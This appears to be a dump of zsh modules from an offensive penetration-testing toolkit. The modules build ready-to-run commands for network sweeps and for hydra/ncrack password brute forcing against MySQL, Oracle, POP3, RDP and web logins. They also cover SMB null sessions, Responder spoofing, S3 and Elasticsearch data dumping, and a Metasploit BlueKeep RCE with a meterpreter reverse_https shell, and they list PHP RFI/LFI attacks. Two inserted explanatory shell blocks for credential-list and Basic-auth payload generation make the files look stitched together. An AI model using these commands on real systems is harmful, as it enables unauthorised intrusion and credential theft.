qq-vars-set-rhost
__check-user
local db && __prefill db DATABASE mysql
print -z "hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/mysql-hydra-brute.txt ${__RHOST} MYSQL ${db}"
}
================================================
FILE: modules/qq-enum-network.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-network
#############################################################
qq-enum-network-help() {
cat << "DOC"
qq-enum-network
-------------
The qq-enum-network namespace contains commands for scanning and enumerating
a network.
Commands
--------
qq-enum-network-install: installs dependencies
qq-enum-network-tcpdump: capture traffic to and from a network
qq-enum-network-tcpdump-bcasts: capture ethernet broadcasts and multi-cast traffic
qq-enum-network-nmap-ping-sweep: sweep a network with ping requests
qq-enum-network-nmap-syn-sweep: sweep a network with TCP syn requests, top 1000 ports
qq-enum-network-nmap-udp-sweep: sweep a network with UDP requests, top 100 ports
qq-enum-network-nmap-all-sweep: sweep a network with TCP syn requests, all ports
qq-enum-network-nmap-discovery: sweep a network with TCP syn requests and scripts, top 100 ports
qq-enum-network-masscan-top: sweep a network with TCP requests, uses $__TCP_PORTS global var
qq-enum-network-masscan-windows: sweep a network for common Windows ports
qq-enum-network-masscan-linux: sweep a network for common Linux ports
qq-enum-network-masscan-web: sweep a network for common web server ports
DOC
}
qq-enum-network-install() {
__info "Running $0..."
__pkgs tcpdump nmap masscan
}
qq-enum-network-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-network
print -z "sudo tcpdump -i ${__IFACE} net ${__NETWORK} -w $(__netpath)/network.pcap"
}
qq-enum-network-tcpdump-bcasts() {
__check-project
qq-vars-set-iface
print -z "sudo tcpdump -i ${__IFACE} ether broadcast or ether multicast -w $__PROJECT/networks/bcasts.pcap"
}
qq-enum-network-nmap-ping-sweep() {
__check-project
qq-vars-set-network
print -z "nmap -vvv -sn --open ${__NETWORK} -oA $(__netpath)/nmap-ping-sweep"
}
qq-enum-network-nmap-syn-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -vvv -n -Pn -sS --open --top-ports 100 ${__NETWORK} -oA $(__netpath)/nmap-syn-sweep"
}
qq-enum-network-nmap-udp-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -vvv -n -Pn -sU --open --top-ports 100 ${__NETWORK} -oA $(__netpath)/nmap-udp-sweep"
}
qq-enum-network-nmap-all-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -vvv -n -Pn -T4 --open -sS -p- ${__NETWORK} -oA $(__netpath)/nmap-all-sweep"
}
qq-enum-network-nmap-discovery() {
__check-project
qq-vars-set-network
print -z "nmap -vvv -n -Pn -sV -sC --top-ports 100 ${__NETWORK} -oA $(__netpath)/nmap-discovery"
}
qq-enum-network-masscan-top() {
__check-project
qq-vars-set-network
print -z "sudo masscan ${__NETWORK} -p${__TCP_PORTS} -oL $(__netpath)/masscan-top.txt"
}
qq-enum-network-masscan-windows() {
__check-project
qq-vars-set-network
print -z "sudo masscan ${__NETWORK} -p135-139,445,3389,389,636,88 -oL $(__netpath)/masscan-windows.txt"
}
qq-enum-network-masscan-linux() {
__check-project
qq-vars-set-network
print -z "sudo masscan ${__NETWORK} -p22,111,2222 -oL $(__netpath)/masscan-linux.txt"
}
qq-enum-network-masscan-web() {
__check-project
qq-vars-set-network
print -z "sudo masscan ${__NETWORK} -p80,800,8000,8080,8888,443,4433,4443 -oL $(__netpath)/masscan-web.txt"
}
================================================
FILE: modules/qq-enum-nfs.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-nfs
#############################################################
qq-enum-nfs-help() {
cat << "DOC"
qq-enum-nfs
-----------
The qq-enum-nfs namespace contains commands for scanning and
enumerating NFS services.
Commands
--------
qq-enum-nfs-install: installs dependencies
qq-enum-nfs-nmap-sweep: scan a network for services
qq-enum-nfs-tcpdump: capture traffic to and from a host
qq-enum-nfs-show: show remote NFS shares
qq-enum-nfs-mount: mount a remote NFS share locally
DOC
}
qq-enum-nfs-install() {
__info "Running $0..."
__pkgs tcpdump nmap nfs-common
}
qq-enum-nfs-nmap-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -n -Pn -sS -sU -p U:111,T:111,U:2049,T:2049 ${__NETWORK} -oA $(__netpath)/nfs-sweep"
}
qq-enum-nfs-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-rhost
print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp and \(port 111 or port 2049\) -w $(__hostpath)/nfs.pcap"
}
qq-enum-nfs-show() {
qq-vars-set-rhost
print -z "showmount -e ${__RHOST}"
}
qq-enum-nfs-mount() {
qq-vars-set-rhost
local share && __askvar share SHARE
sudo mkdir -p /mnt/${share}
print -z "sudo mount -t nfs ${__RHOST}:/${share} /mnt/${share} -o nolock"
}
================================================
FILE: modules/qq-enum-oracle.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-oracle
#############################################################
qq-enum-oracle-help() {
cat << "DOC"
qq-enum-oracle
--------------
The qq-enum-oracle namespace contains commands for scanning and
enumerating Oracle services and databases.
Commands
--------
qq-enum-oracle-install: installs dependencies
qq-enum-oracle-nmap-sweep: scan a network for services
qq-enum-oracle-tcpdump: capture traffic to and from a host
qq-enum-oracle-sqlplus: sqlplus client
qq-enum-oracle-odat: odat anonymous enumeration
qq-enum-oracle-odat-creds: odat authenticated enumeration
qq-enum-oracle-odat-passwords: odat password brute
qq-enum-oracle-version: tnscmd version query
qq-enum-oracle-status: tnscmd status query
qq-enum-oracle-sidguess: sidguess SID brute force
qq-enum-oracle-oscanner: oscanner enumeration
qq-enum-oracle-hydra-listener: brute force the listener password with hydra
qq-enum-oracle-hydra-sid: brute force SIDs with hydra
DOC
}
qq-enum-oracle-install() {
__info "Running $0..."
__pkgs tcpdump nmap odat tnscmd10g sidguess oscanner hydra
__pkgs oracle-instantclient-sqlplus
sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf"; sudo ldconfig
}
qq-enum-oracle-nmap-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -n -Pn -sS -p 1521 ${__NETWORK} -oA $(__netpath)/oracle-sweep"
}
qq-enum-oracle-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-rhost
print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 1521 -w $(__hostpath)/oracle.pcap"
}
qq-enum-oracle-sqlplus() {
qq-vars-set-rhost
local sid && __askvar sid "SID(DATABASE)"
local u && __askvar u "USER"
local p && __askvar p "PASSWORD"
print -z "sqlplus ${u}/${p}@${__RHOST}:1521/${sid} as sysdba"
}
qq-enum-oracle-odat() {
qq-vars-set-rhost
print -z "odat all -s ${__RHOST}"
}
qq-enum-oracle-odat-creds() {
qq-vars-set-rhost
local sid && __askvar sid "SID(DATABASE)"
local u && __askvar u "USER"
local p && __askvar p "PASSWORD"
print -z "odat all -s ${__RHOST} -p 1521 -d ${sid} -U ${u} -P ${p}"
}
qq-enum-oracle-odat-passwords() {
qq-vars-set-rhost
local sid && __askvar sid "SID(DATABASE)"
__info "Build accounts.txt (user/password per line) from the metasploit list first:"
__info "cat /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt | sed -e 's|[[:space:]][[:space:]]*|/|' > accounts.txt"
print -z "odat passwordguesser -s ${__RHOST} -d ${sid} --accounts-file accounts.txt"
}
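odat's `passwordguesser` reads `user/password` pairs from its `--accounts-file`, while the metasploit list the hint above points at is `user password` separated by whitespace. As an added example that is not quiver's code, here is a POSIX shell converter with a constructed sample list; the function names are assumptions of this example, and the sample is not the real metasploit file.

```bash
#!/bin/sh
# Added example, not quiver's own code: convert a whitespace separated
# "user password" wordlist (the layout of metasploit's
# oracle_default_userpass.txt) into the "user/password" lines that
# odat passwordguesser --accounts-file expects.

# userpass_to_odat_accounts IN [OUT]: writes OUT (default accounts.txt)
# and prints the number of account lines written. Comment lines and
# lines without both fields are skipped; tabs and runs of spaces are
# both accepted as separators (awk's default field splitting).
userpass_to_odat_accounts() {
    local in=$1 out=${2:-accounts.txt}
    awk 'NF >= 2 && $1 !~ /^#/ { print $1 "/" $2 }' "$in" > "$out"
    wc -l < "$out" | tr -d ' '
}

# Constructed sample in the metasploit layout (not the real file); prints its path.
userpass_sample_file() {
    local f
    f=$(mktemp)
    {
        printf '# constructed sample, user<space>password per line\n'
        printf 'SYS CHANGE_ON_INSTALL\n'
        printf 'SYSTEM\tMANAGER\n'
        printf 'SCOTT TIGER\n'
        printf '\n'
        printf 'DBSNMP DBSNMP\n'
    } > "$f"
    printf '%s' "$f"
}

# Usage: convert the sample and show the odat command that consumes it.
sample=$(userpass_sample_file)
count=$(userpass_to_odat_accounts "$sample" "$sample.odat")
echo "wrote $count accounts to $sample.odat"
echo "run: odat passwordguesser -s <rhost> -d <sid> --accounts-file $sample.odat"
rm -f "$sample" "$sample.odat"
```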
qq-enum-oracle-version(){
qq-vars-set-rhost
print -z "tnscmd10g version -h ${__RHOST}"
}
qq-enum-oracle-status(){
qq-vars-set-rhost
print -z "tnscmd10g status -h ${__RHOST}"
}
qq-enum-oracle-sidguess(){
qq-vars-set-rhost
print -z "sidguess host=${__RHOST} port=1521 sidfile=sid.txt"
}
qq-enum-oracle-oscanner() {
qq-vars-set-rhost
print -z "oscanner -s ${__RHOST}"
}
qq-enum-oracle-hydra-listener() {
__check-project
qq-vars-set-rhost
__info "The listener password is not tied to a user account, so only a password list is needed"
print -z "hydra -P ${__PASSLIST} -o $(__hostpath)/oracle-listener-hydra-brute.txt -s 1521 ${__RHOST} oracle-listener"
}
qq-enum-oracle-hydra-sid() {
__check-project
qq-vars-set-rhost
__info "Candidate SIDs are read from sid.txt in the current directory, one per line"
print -z "hydra -L sid.txt -o $(__hostpath)/oracle-sid-hydra-brute.txt -s 1521 ${__RHOST} oracle-sid"
}
================================================
FILE: modules/qq-enum-pop3.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-pop3
#############################################################
qq-enum-pop3-help() {
cat << "DOC"
qq-enum-pop3
------------
The qq-enum-pop3 namespace contains commands for scanning
and enumerating POP3 email services.
Commands
--------
qq-enum-pop3-install: installs dependencies
qq-enum-pop3-nmap-sweep: scan a network for services
qq-enum-pop3-tcpdump: capture traffic to and from a host
qq-enum-pop3-hydra: brute force passwords for a user account
DOC
}
qq-enum-pop3-install() {
__info "Running $0..."
__pkgs nmap tcpdump hydra
}
qq-enum-pop3-nmap-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -n -Pn -sS -p 110,995 ${__NETWORK} -oA $(__netpath)/pop3-sweep"
}
qq-enum-pop3-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-rhost
print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp and \(port 110 or port 995\) -w $(__hostpath)/pop3.pcap"
}
qq-enum-pop3-hydra() {
__check-project
qq-vars-set-rhost
__check-user
print -z "hydra -l ${__USER} -P ${__PASSLIST} -e ns -o $(__hostpath)/pop3-hydra-brute.txt ${__RHOST} pop3"
}
================================================
FILE: modules/qq-enum-rdp.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-rdp
#############################################################
qq-enum-rdp-help() {
cat << "DOC"
qq-enum-rdp
------------
The qq-enum-rdp namespace contains commands for scanning
and enumerating RDP remote desktop services.
Commands
--------
qq-enum-rdp-install: installs dependencies
qq-enum-rdp-nmap-sweep: scan a network for services
qq-enum-rdp-tcpdump: capture traffic to and from a host
qq-enum-rdp-ncrack: brute force passwords for a user account
qq-enum-rdp-bluekeep: bluekeep exploit reference
qq-enum-rdp-msf-bluekeep-scan: bluekeep metasploit scanner
qq-enum-rdp-msf-bluekeep-exploit: bluekeep metasploit exploit
DOC
}
qq-enum-rdp-install() {
__info "Running $0..."
__pkgs nmap tcpdump ncrack metasploit-framework
}
qq-enum-rdp-nmap-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -n -Pn -sS -p3389 ${__NETWORK} -oA $(__netpath)/rdp-sweep"
}
qq-enum-rdp-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-rhost
print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 3389 -w $(__hostpath)/rdp.pcap"
}
qq-enum-rdp-ncrack() {
__check-project
qq-vars-set-rhost
__check-user
print -z "ncrack -vv --user ${__USER} -P ${__PASSLIST} rdp://${__RHOST} -oN $(__hostpath)/ncrack-rdp.txt "
}
qq-enum-rdp-bluekeep() {
__info "https://sploitus.com/exploit?id=EDB-ID:47683"
print -z "searchsploit bluekeep"
}
qq-enum-rdp-msf-bluekeep-scan() {
__check-project
qq-vars-set-rhost
local cmd="use auxiliary/scanner/rdp/cve_2019_0708_bluekeep; set RHOSTS ${__RHOST}; run; exit"
print -z "msfconsole -n -q -x \" ${cmd} \" | tee $(__hostpath)/bluekeep-scan.txt"
}
qq-enum-rdp-msf-bluekeep-exploit() {
qq-vars-set-rhost
qq-vars-set-lhost
qq-vars-set-lport
#__warn "Start a handler using on ${__LHOST}:${__LPORT} before proceeding"
__msf << VAR
use windows/rdp/cve_2019_0708_bluekeep_rce;
set RHOSTS ${__RHOST};
set PAYLOAD windows/x64/meterpreter/reverse_https;
set stagerverifysslcert true;
set HANDLERSSLCERT ${__SHELL_SSL_CERT};
set LHOST ${__LHOST};
set LPORT ${__LPORT};
run;
exit
VAR
}
================================================
FILE: modules/qq-enum-smb.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-smb
#############################################################
qq-enum-smb-help() {
cat << "DOC"
qq-enum-smb
------------
The qq-enum-smb namespace contains commands for scanning
and enumerating smb services.
Commands
--------
qq-enum-smb-install: installs dependencies
qq-enum-smb-nmap-sweep: scan a network for services
qq-enum-smb-tcpdump: capture traffic to and from a host
qq-enum-smb-null-smbmap: query with smbmap null session
qq-enum-smb-user-smbmap: query with smbmap authenticated session
qq-enum-smb-null-enum4: enumerate with enum4linux
qq-enum-smb-null-smbclient-list: list shares with a null session
qq-enum-smb-null-smbclient-connect: connect with a null session
qq-enum-smb-user-smbclient-connect: connect with an authenticated session
qq-enum-smb-user-mount: mount an SMB share with an authenticated session
qq-enum-smb-samrdump: dump info using impacket
qq-enum-smb-responder: spoof and get responses using responder
qq-enum-smb-net-use-null: print a net use statement for windows
qq-enum-smb-nbtscan: scan a local network
qq-enum-smb-rpcclient: use rcpclient for queries
DOC
}
qq-enum-smb-install() {
__info "Running $0..."
__pkgs nmap tcpdump smbmap enum4linux smbclient impacket-scripts responder nbtscan
}
qq-enum-smb-nmap-sweep() {
__check-project
qq-vars-set-network
print -z "sudo nmap -n -Pn -sS -sU -p T:139,445,U:137 ${__NETWORK} -oA $(__netpath)/smb-sweep"
}
qq-enum-smb-tcpdump() {
__check-project
qq-vars-set-iface
qq-vars-set-rhost
print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 445 -w $(__hostpath)/smb.pcap"
}
qq-enum-smb-null-smbmap() {
qq-vars-set-rhost
print -z "smbmap -H ${__RHOST}"
}
qq-enum-smb-user-smbmap() {
qq-vars-set-rhost
__check-user
__info "Usage with creds: -u <user> -p <pass> -d <domain>"
print -z "smbmap -u ${__USER} -H ${__RHOST}"
}
qq-enum-smb-null-enum4() {
qq-vars-set-rhost
print -z "enum4linux -a ${__RHOST} | tee $(__hostpath)/enum4linux.txt "
}
qq-enum-smb-null-smbclient-list() {
qq-vars-set-rhost
print -r -z "smbclient -L \\\\\\\\${__RHOST} -N "
}
qq-enum-smb-null-smbclient-connect() {
qq-vars-set-rhost
__check-share
print -r -z "smbclient \\\\\\\\${__RHOST}\\\\${__SHARE} -N "
}
qq-enum-smb-user-smbclient-connect() {
qq-vars-set-rhost
__check-user
__check-share
print -r -z "smbclient \\\\\\\\${__RHOST}\\\\${__SHARE} -U ${__USER} "
}
qq-enum-smb-user-mount() {
qq-vars-set-rhost
__check-user
local p && __askvar p PASSWORD
__check-share
sudo mkdir -p /mnt/${__SHARE}
print -z "sudo mount -t cifs //${__RHOST}/${__SHARE} /mnt/${__SHARE} -o username=${__USER},password=${p}"
}
qq-enum-smb-samrdump() {
qq-vars-set-rhost
print -z "python3 ${__IMPACKET}/samrdump.py ${__RHOST}"
}
qq-enum-smb-responder() {
qq-vars-set-iface
print -z "responder -I ${__IFACE} -A"
}
qq-enum-smb-net-use-null() {
qq-vars-set-rhost
__info "net use \\\\\\\\${__RHOST}\\IPC$ \"\" /u:\"\" "
}
qq-enum-smb-nbtscan() {
qq-vars-set-network
print -z "nbtscan ${__NETWORK}"
}
qq-enum-smb-rpcclient() {
qq-vars-set-rhost
print -z "rpcclient -U \"\" -N ${__RHOST}"
}
================================================
FILE: modules/qq-enum-web-aws.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-web-aws
#############################################################
qq-enum-web-aws-help() {
cat << "DOC"
qq-enum-web-aws
---------------
The qq-enum-web-aws namespace contains commands for scanning
and enumerating AWS hosted services.
Commands
--------
qq-enum-web-aws-install: installs dependencies
qq-enum-web-aws-s3-ls: use the awscli to list files in an S3 bucket
qq-enum-web-aws-s3-write: use the awscli to copy a local file to an S3 bucket
qq-enum-web-aws-s3-scanner: scan a list of buckets
DOC
}
qq-enum-web-aws-install() {
__info "Running $0..."
__pkgs awscli
qq-install-s3scanner
}
qq-enum-web-aws-s3-ls() {
qq-vars-set-rhost
print -z "aws s3 ls s3://${__RHOST} --recursive"
}
qq-enum-web-aws-s3-write() {
qq-vars-set-rhost
__ask "Select a file to copy to the S3 bucket"
local f && __askpath f FILE $(pwd)
print -z "aws s3 cp \"${f}\" s3://${__RHOST}"
}
qq-enum-web-aws-s3-scanner() {
__ask "Select a file that contains a list of S3 buckets"
local f && __askpath f FILE $(pwd)
__info "Use -d to dump buckets to local path"
print -z "python3 ${__TOOLS}/S3Scanner/s3scanner.py ${f}"
}
================================================
FILE: modules/qq-enum-web-dirs.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-web-dirs
#############################################################
qq-enum-web-dirs-help() {
cat << "DOC"
qq-enum-web-dirs
----------------
The qq-enum-web-dirs namespace contains commands for discovering web content, directories and files.
Commands
--------
qq-enum-web-dirs-install: installs dependencies
qq-enum-web-dirs-robots: get robots.txt using curl
qq-enum-web-dirs-parsero: parse complex robots.txt with parsero
qq-enum-web-dirs-wfuzz: brute force dirs and files with wfuzz
qq-enum-web-dirs-ffuf: brute force dirs and files with ffuf
qq-enum-web-dirs-gobuster: brute force dirs and files with gobuster
DOC
}
qq-enum-web-dirs-install() {
__info "Running $0..."
__pkgs parsero gobuster wfuzz curl seclists wordlists
qq-install-golang
go install github.com/ffuf/ffuf/v2@latest
go install github.com/tomnomnom/httprobe@latest
}
qq-enum-web-dirs-robots() {
__check-project
qq-vars-set-url
print -z "curl -s -L --user-agent \"${__UA}\" \"${__URL}/robots.txt\" | tee $(__urlpath)/robots.txt"
}
qq-enum-web-dirs-parsero() {
__check-project
qq-vars-set-url
print -z "parsero -u \"${__URL}\" -o -sb | tee $(__urlpath)/robots.txt"
}
qq-enum-web-dirs-wfuzz() {
__check-project
qq-vars-set-url
qq-vars-set-wordlist
local d && __askvar d "RECURSION DEPTH"
print -z "wfuzz -s 0.1 -R${d} --hc=404 -w ${__WORDLIST} ${__URL}/FUZZ --oF $(__urlpath)/wfuzz-dirs.txt"
}
qq-enum-web-dirs-ffuf() {
__check-project
qq-vars-set-url
qq-vars-set-wordlist
__check-threads
local d && __askvar d "RECURSION DEPTH"
print -z "ffuf -p 0.1 -t ${__THREADS} -recursion -recursion-depth ${d} -H \"User-Agent: Mozilla\" -fc 404 -w ${__WORDLIST} -u ${__URL}/FUZZ -o $(__urlpath)/ffuf-dirs.csv -of csv"
}
qq-enum-web-dirs-gobuster() {
__check-project
qq-vars-set-url
qq-vars-set-wordlist
__check-threads
print -z "gobuster dir -u ${__URL} -a \"${__UA}\" -t ${__THREADS} -k -w ${__WORDLIST} | tee $(__urlpath)/gobuster-dirs.txt "
}
================================================
FILE: modules/qq-enum-web-eslastic.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-web-elastic
#############################################################
qq-enum-web-elastic-help() {
cat << "DOC"
qq-enum-web-elastic
-------------------
The qq-enum-web-elastic namespace contains commands for scanning and enumerating
elastic search services.
Commands
--------
qq-enum-web-elastic-install: installs dependencies
qq-enum-web-elastic-nmap: scan the target using the elasticsearch nmap nse script
qq-enum-web-elastic-health: query the target using curl for cluster health
qq-enum-web-elastic-indices: query the target using curl for indices
qq-enum-web-elastic-search: query an index using curl
qq-enum-web-elastic-all: query for 1000 records in an index using curl
DOC
}
qq-enum-web-elastic-install() {
__info "Running $0..."
__pkgs nmap curl
qq-install-nmap-elasticsearch-nse
}
qq-enum-web-elastic-nmap() {
__check-project
qq-vars-set-rhost
print -z "sudo nmap -n -Pn -p9200 --script=elasticsearch ${__RHOST} -oN $(__hostpath)/nmap-elastic.txt"
}
qq-enum-web-elastic-health() {
qq-vars-set-url
print -z "curl -A \"${__UA}\" -XGET \"${__URL}:9200/_cluster/health?pretty\""
}
qq-enum-web-elastic-indices() {
qq-vars-set-url
print -z "curl -A \"${__UA}\" -XGET \"${__URL}:9200/_cat/indices?v\""
}
qq-enum-web-elastic-search() {
qq-vars-set-url
local i && __askvar i "INDEX"
__ask "Enter a query, such as *:password"
local q && __askvar q "QUERY"
print -z "curl -A \"${__UA}\" -XGET \"${__URL}:9200/${i}/_search?q=${q}&size=10&pretty\""
}
qq-enum-web-elastic-all() {
__check-project
qq-vars-set-url
local i && __askvar i "INDEX"
print -z "curl -A \"${__UA}\" -XGET \"${__URL}:9200/${i}/_search?size=1000\" | tee $(__urlpath)/elastic-docs.json"
}
================================================
FILE: modules/qq-enum-web-fuzz.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-web-fuzz
#############################################################
qq-enum-web-fuzz-help() {
cat << "DOC"
qq-enum-web-fuzz
----------------
The qq-enum-web-fuzz namespace contains commands for fuzzing
inputs of web applications
Commands
--------
qq-enum-web-fuzz-install: installs dependencies
qq-enum-web-fuzz-auth-basic-payloads: generate base64 encoded credentials
qq-enum-web-fuzz-auth-basic-ffuf: brute force basic auth
qq-enum-web-fuzz-auth-json-ffuf: brute force basic auth with json post
qq-enum-web-fuzz-auth-post-ffuf: brute force auth with post
qq-enum-web-fuzz-auth-post-wfuzz: brute force auth with post
qq-enum-web-brute-hydra-get: brute force auth with get
qq-enum-web-brute-hydra-form-post: brute force auth with post
DOC
}
qq-enum-web-fuzz-install() {
__info "Running $0..."
__pkgs seclists wordlists wfuzz hydra
qq-install-golang
go install github.com/ffuf/ffuf/v2@latest
}
qq-enum-web-fuzz-auth-basic-payloads() {
qq-vars-set-wordlist
__check-user
print -z "while IFS= read -r line; do printf '%s' \"${__USER}:\$line\" | base64; done < \"${__WORDLIST}\" > payloads.b64"
}
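HTTP Basic credentials are `base64(user:password)`, and the generator above must not fold a trailing newline into the encoded token or every guess is wrong by one byte. As an added example that is not quiver's code, here is the same idea as POSIX shell functions with a constructed three-word password list and a decode round-trip to check the payloads; the function names are assumptions of this example.

```bash
#!/bin/sh
# Added example, not quiver's own code: build the base64 tokens that
# `ffuf -H "Authorization: Basic FUZZ"` consumes from a user name and a
# password wordlist. Each token is base64("user:password") with no
# newline inside the encoded input.

# basic_auth_token USER PASS: prints base64("USER:PASS") on one line.
# printf '%s' (not echo) keeps the newline out of the encoded input, and
# tr -d strips the line wrapping some base64 implementations add.
basic_auth_token() {
    printf '%s' "$1:$2" | base64 | tr -d '\n'
}

# basic_auth_payloads USER WORDLIST [OUT]: one token per wordlist line,
# written to OUT (default payloads.b64); prints the number of tokens.
basic_auth_payloads() {
    local user=$1 wordlist=$2 out=${3:-payloads.b64} pass
    : > "$out"
    # `|| [ -n "$pass" ]` keeps a final line that lacks a trailing newline.
    while IFS= read -r pass || [ -n "$pass" ]; do
        basic_auth_token "$user" "$pass" >> "$out"
        printf '\n' >> "$out"
    done < "$wordlist"
    wc -l < "$out" | tr -d ' '
}

# basic_auth_decode TOKEN: recover "user:password" to verify a payload.
basic_auth_decode() {
    printf '%s' "$1" | base64 -d
}

# Constructed three-word password list (not a real wordlist); prints its path.
password_sample_file() {
    local f
    f=$(mktemp)
    printf 'password\nadmin\nletmein\n' > "$f"
    printf '%s' "$f"
}

# Usage: generate payloads for user admin, then show the ffuf command.
sample=$(password_sample_file)
n=$(basic_auth_payloads admin "$sample" "$sample.b64")
echo "$n payloads in $sample.b64"
echo "run: ffuf -w $sample.b64 -H 'Authorization: Basic FUZZ' -fc 401 -u <url>"
rm -f "$sample" "$sample.b64"
```

An empty wordlist line is kept on purpose: it yields `base64("user:")`, the null-password guess that hydra's `-e n` would also try.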
# ffuf
qq-enum-web-fuzz-auth-basic-ffuf() {
qq-vars-set-url
__ask "Select file containing authorization header payloads"
local f && __askpath f FILE $(pwd)
__check-threads
print -z "ffuf -t ${__THREADS} -p \"0.1\" -w ${f} -H \"Authorization: Basic FUZZ\" -fc 401 -u ${__URL} "
}
qq-enum-web-fuzz-auth-json-ffuf() {
qq-vars-set-url
__check-threads
print -z "ffuf -t ${__THREADS} -p \"0.1\" -w /usr/share/seclists/Fuzzing/Databases/NoSQL.txt -u ${__URL} -X POST -H \"Content-Type: application/json\" -d '{\"username\": \"FUZZ\", \"password\": \"FUZZ\"}' -fr \"error\" "
}
qq-enum-web-fuzz-auth-post-ffuf() {
qq-vars-set-url
local uf && __askvar uf USER_FIELD
local uv && __askvar uv USER_VALUE
local pf && __askvar pf PASSWORD_FIELD
__check-threads
print -z "ffuf -t ${__THREADS} -p \"0.1\" -w ${__PASSLIST} -H \"Content-Type: application/x-www-form-urlencoded\" -X POST -d \"${uf}=${uv}&${pf}=FUZZ\" -u ${__URL} -fs 75 "
}
# wfuzz
qq-enum-web-fuzz-auth-post-wfuzz() {
qq-vars-set-url
local uf && __askvar uf USER_FIELD
local uv && __askvar uv USER_VALUE
local pf && __askvar pf PASSWORD_FIELD
print -z "wfuzz -c -w ${__PASSLIST} -d \"${uf}=${uv}&${pf}=FUZZ\" --sc 302 ${__URL}"
}
qq-enum-web-brute-hydra-get() {
qq-vars-set-rhost
__check-user
__ask "Enter the URI for the get request, ex: /path"
local uri && __askvar uri URI
print -z "hydra -l ${__USER} -P ${__PASSLIST} ${__RHOST} http-get ${uri}"
}
qq-enum-web-brute-hydra-form-post() {
qq-vars-set-rhost
__ask "Enter the URI for the post request, ex: /path"
local uri && __askvar uri URI
local uf && __askvar uf USER_FIELD
local uv && __askvar uv USER_VALUE
local pf && __askvar pf PASSWORD_FIELD
__ask "Enter the response value to check for failure"
local fm && __askvar fm FAILURE
print -z "hydra ${__RHOST} http-form-post \"${uri}:${uf}=^USER^&${pf}=^PASS^:${fm}\" -l ${uv} -P ${__PASSLIST} -t 10 -w 30 "
}
================================================
FILE: modules/qq-enum-web-js.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-web-js
#############################################################
qq-enum-web-js-help() {
cat << "DOC"
qq-enum-web-js
--------------
The qq-enum-web-js namespace contains commands for enumerating
javascript files and mining for urls and secrets.
Commands
--------
qq-enum-web-js-install: installs dependencies
qq-enum-web-js-beautify: beautify JS file
qq-enum-web-js-link-finder-url: run linkfinder on a file
qq-enum-web-js-link-finder-domain: run linkfinder on all files of a site
qq-enum-web-js-curl: enumerate links using curl
DOC
}
qq-enum-web-js-install() {
__info "Running $0..."
__pkgs jsbeautifier
qq-install-link-finder
qq-install-node
npm i -g eslint
}
qq-enum-web-js-beautify() {
local f && __askpath f FILE $(pwd)
print -z "js-beautify ${f} > source-$(basename ${f})"
}
qq-enum-web-js-link-finder-url() {
__check-project
__ask "Set the URL of a javascript file"
qq-vars-set-url
print -z "python3 linkfinder.py -i ${__URL} -o $(__urlpath)/js-links.html"
}
qq-enum-web-js-link-finder-domain() {
__check-project
qq-vars-set-url
print -z "python3 linkfinder.py -i ${__URL} -d -o $(__urlpath)/js-links-all.html"
}
qq-enum-web-js-curl() {
qq-vars-set-url
curl -Lks ${__URL} | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=${__URL} '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"'##### %\";curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"('#####.*)|(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\" | sort -fu" | tr -d "'\""
}
================================================
FILE: modules/qq-enum-web-php.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq-enum-web-php
#############################################################
qq-enum-web-php-help() {
cat << "DOC"
qq-enum-web-php
----------------
The qq-enum-web-php namespace contains commands for discovering web content, directories and files
on PHP web servers
Commands
--------
qq-enum-web-php-install: installs dependencies
qq-enum-web-php-ffuf: scan for PHP files
qq-enum-web-php-rfi: exploit typical RFI params
qq-enum-web-php-rfi-input: RFI via the php://input wrapper with a POST body payload
qq-enum-web-php-lfi-proc-self-environ: LFI of /proc/self/environ with a User-Agent payload
qq-enum-web-php-lfi-filter-resource: read source with the php://filter base64 wrapper
qq-enum-web-php-lfi-zip-jpg-shell: LFI via the zip:// wrapper of an uploaded shell.jpg
qq-enum-web-php-lfi-logfile: LFI via a poisoned apache access log
qq-enum-web-php-gen-htaccess: generate an htaccess file
qq-enum-web-php-phpinfo: generate phpinfo payload
DOC
}
qq-enum-web-php-install() {
__info "Running $0..."
